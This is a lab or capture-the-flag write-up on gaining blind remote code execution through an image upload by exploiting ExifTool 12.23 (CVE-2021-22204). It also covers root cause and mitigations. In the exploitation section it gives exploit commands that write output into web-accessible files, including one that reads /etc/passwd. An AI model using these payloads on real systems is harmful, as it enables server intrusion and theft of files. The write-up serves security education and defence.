Blind Remote Code Execution via ExifTool CVE-2021-22204 | The Oak
Lab Link
Lab: The Oak
Overview
The Oak challenge demonstrates how a vulnerable third-party component in an image-processing pipeline can lead to complete server compromise.
During testing, user-uploaded profile images were processed server-side. By comparing the original uploaded image with the server-generated version, it became apparent that the application was using an outdated version of ExifTool.
Further analysis revealed that the server was running ExifTool 12.23, a version vulnerable to CVE-2021-22204, a critical arbitrary code execution vulnerability involving DjVu metadata parsing.
Because uploaded images were automatically processed after upload, it became possible to achieve blind remote command execution through a crafted malicious image.
Objective
Gain remote code execution through the image upload functionality and retrieve the flag from the target system.
Vulnerability Identification
Classification Hierarchy
1
2
3
4
5
6
OWASP Top 10:2025
└── A03 - Software Supply Chain Failures
└── Vulnerable Third-Party Component
└── ExifTool 12.23
└── CVE-2021-22204
└── Arbitrary Code Execution
Vulnerable Functionality
Profile image uploads are available at:
1
/account/profile.php
After uploading an image, the application stores it under:
1
/uploads/avatars/
The server automatically processes uploaded files before making them available for download.
Reconnaissance
Create an Account
Register a new user account:
1
/register.php
After authentication, navigate to:
1
/account/profile.php
and upload a test image.
Locate Uploaded File
Reviewing Burp Suite history revealed the generated image path:
1
/uploads/avatars/u6-images.jpeg
The processed image could then be downloaded directly.
Metadata Analysis
Compare:
- Original image
- Server-generated image
Using ExifTool:
1
exiftool original.jpg
1
exiftool downloaded.jpg
The original image contained no ExifTool-generated metadata.
However, the downloaded image contained:
1
Software : ExifTool 12.23
This immediately identified the image-processing backend.
Vulnerable Component Discovery
Researching ExifTool 12.23 revealed:
1
CVE-2021-22204
ExifTool 12.23 - Arbitrary Code Execution
The vulnerability abuses DjVu metadata parsing and allows command execution when a malicious image is processed.
Exploitation
Environment Setup
Install the required dependencies:
1
sudo apt install -y djvulibre-bin exiftool
Obtain the public exploit:
1
50911.py
Initial Proof of Execution
Generate a malicious image:
1
python3 50911.py -c "id"
This creates:
1
image.jpg
Upload the generated image through:
1
/account/profile.php
No visible output appeared, suggesting a blind command execution scenario.
Blind Command Execution Verification
Instead of returning command output directly, write data into a web-accessible file.
Generate a new payload:
1
python3 50911.py -c "echo pwned > /var/www/html/uploads/avatars/pwned.txt"
Upload the malicious image.
Confirming RCE
Browse to:
1
/uploads/avatars/pwned.txt
Response:
1
pwned
This confirms arbitrary command execution on the server.
Proof of Exploitation
Reading System Files
Generate a payload that copies /etc/passwd into a web-accessible file:
1
python3 50911.py -c "cat /etc/passwd > /var/www/html/uploads/avatars/pwned.txt"
Upload the image.
Visiting:
1
/uploads/avatars/pwned.txt
returned the contents of:
1
/etc/passwd
confirming full command execution and file read capabilities.
Retrieving the Flag
Generate a payload that copies the flag into a readable location:
1
python3 50911.py -c "cat /flag.txt > /var/www/html/uploads/avatars/flag.txt"
Upload the image.
Navigate to:
1
/uploads/avatars/flag.txt
The application returned the flag file contents.
Root Cause Analysis
The application processes uploaded images using:
1
ExifTool 12.23
This version is vulnerable to:
1
CVE-2021-22204
When ExifTool parses a specially crafted DjVu payload embedded inside an uploaded image, attacker-controlled commands are executed on the server.
The application performs image processing on untrusted user content without updating the vulnerable dependency.
Impact
Successful exploitation allows an attacker to:
- Execute arbitrary operating system commands
- Read sensitive files
- Access application secrets
- Retrieve environment variables
- Pivot further into the system
- Achieve complete server compromise
In a production environment this could result in:
- Customer data exposure
- Credential theft
- Database compromise
- Full infrastructure takeover
Mitigation
Update ExifTool
Upgrade to a patched version:
1
exiftool -ver
Ensure the installed version is newer than the vulnerable releases.
Restrict Image Processing
Avoid processing untrusted uploads with privileged services.
Sandbox Media Parsers
Run image-processing components inside isolated containers:
1
2
3
4
Docker
Firejail
AppArmor
SELinux
Content Validation
Implement strict validation for:
- MIME types
- File signatures
- File structure
- Embedded metadata
Principle of Least Privilege
Ensure image-processing services cannot write into web-accessible directories.
Real-World Insight
CVE-2021-22204 gained widespread attention after being used in real-world attacks and became especially notable because applications using ExifTool often processed user-controlled files automatically.
This challenge highlights a common security issue:
1
2
The application itself may not contain the vulnerability.
A vulnerable third-party component can still lead to complete compromise.
Supply-chain failures remain one of the most dangerous attack vectors because a single outdated dependency can expose an otherwise secure application to remote code execution.